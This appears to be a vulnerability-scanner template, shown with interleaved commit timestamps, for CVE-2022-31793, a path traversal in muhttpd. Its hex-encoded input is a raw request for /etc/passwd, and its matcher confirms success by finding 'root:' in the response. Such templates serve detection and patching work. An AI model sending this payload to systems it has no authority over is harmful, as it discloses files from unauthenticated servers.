2022-07-31 11:26:56 +00:00
id : CVE-2022-31793
info :
name : muhttpd <= 1.1.5 - Path traversal
author : scent2d
2022-07-31 13:50:22 +00:00
severity : unknown
2022-07-31 11:26:56 +00:00
description : |
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
reference :
- https://derekabdine.com/blog/2022-arris-advisory.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
classification :
2022-07-31 13:50:22 +00:00
cvss-metrics : unknown
cvss-score : 0.0
2022-07-31 11:26:56 +00:00
cve-id : CVE-2022-31793
2022-07-31 13:50:22 +00:00
cwe-id : unknown
2022-07-31 11:26:56 +00:00
tags : cve,cve2022,muhttpd,lfi,unauthenticated
network :
- host :
2022-07-31 13:50:22 +00:00
- "{{Hostname}}"
2022-07-31 11:26:56 +00:00
inputs :
2022-07-31 13:50:22 +00:00
- data : "47455420612F6574632F706173737764"
2022-07-31 11:26:56 +00:00
type : hex
- data : "\n\n"
read-size : 128
matchers :
- type : word
encoding : hex
words :
2022-07-31 13:50:22 +00:00
- "726f6f743a"
part : body
